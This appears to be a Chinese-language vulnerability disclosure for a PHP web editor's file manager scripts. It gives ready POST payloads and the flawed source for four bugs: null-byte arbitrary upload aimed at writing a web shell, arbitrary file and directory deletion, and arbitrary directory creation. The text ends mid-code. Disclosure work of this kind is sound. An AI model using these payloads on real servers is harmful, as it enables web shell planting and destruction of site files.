漏洞一 任意上传文件[magic_quotes_gpc=Off]
漏洞文件:assetmanager.php
POST inpCurrFolder2=/var/www/shell.php%00
漏洞代码:第42行
if(isset($_FILES["File1"]))
{
if(isset($_POST["inpCurrFolder2"]))$currFolder=$_POST['inpCurrFolder2']; //目录可以构造magic_quotes_gpc=off时可写任意文件
if(isset($_REQUEST["inpFilter"]))$ffilter=$_REQUEST["inpFilter"];
if($MaxFileSize && ($_FILES['File1']['size'] > $MaxFileSize))
{
$sMsg = "The file exceeds the maximum size allowed.";
}
else if(!isTypeAllowed($_FILES['File1']['name']))
{
$sMsg = "The File Type is not allowed.";
}
else if (move_uploaded_file($_FILES['File1']['tmp_name'], $currFolder."/".basename($_FILES['File1']['name'])))
{
$sMsg = "";
$sUploadedFile=$_FILES['File1']['name'];
@chmod($currFolder."/".basename($_FILES['File1']['name']), 0644);
}
else
{
$sMsg = "Upload failed.";
}
}
-------------------
2.访问权限未设置导致任意删除文件
漏洞文件:assetmanager.php
[POST] inpFileToDelete=/var/www/index.php
漏洞代码:第72行
if(isset($_POST["inpFileToDelete"]))
{
$filename=pathinfo($_POST["inpFileToDelete"]);
$filename=$filename['basename'];
if($filename!="")
unlink($currFolder . "/" . $filename);
$sMsg = "";
}
-------------------
3.访问权限未设置导致任意目录删漏洞
漏洞文件:folderdel_.php
[POST]inpCurrFolder=/var/www/upload/
漏洞代码 第3行
if(isset($_POST["inpCurrFolder"]))
{
$sDestination = pathinfo($_POST["inpCurrFolder"]);
//DELETE ALL FILES IF FOLDER NOT EMPTY
$dir = $_POST["inpCurrFolder"];
$handle = opendir($dir);
while($file = readdir($handle)) if($file != "." && $file != "..") unlink($dir . "/" . $file);
closedir($handle);
if(rmdir($_POST["inpCurrFolder"])==0)
$sMsg = "";
else
$sMsg = "<script>document.write(getTxt('Folder deleted.'))</script>";
}
-------------------
4.访问权限未设置导致任意目录创建
漏洞文件:foldernew.php
[POST] inpCurrFolder=/var/www/&inpNewFolderName=123
漏洞代码:第3行
if(isset($_POST["inpNewFolderName"]))
{
$sFolder = $_POST["inpCurrFolder"]."/".$_POST["inpNewFolderName"];
if(is_dir($sFolder)==1)
{//folder already exist
$sMsg = "<script>document.write(getTxt('Folder already exists.'))</script>";
}
else
{
//if(mkdir($sFolder))
if(mkdir($sFolder,0755))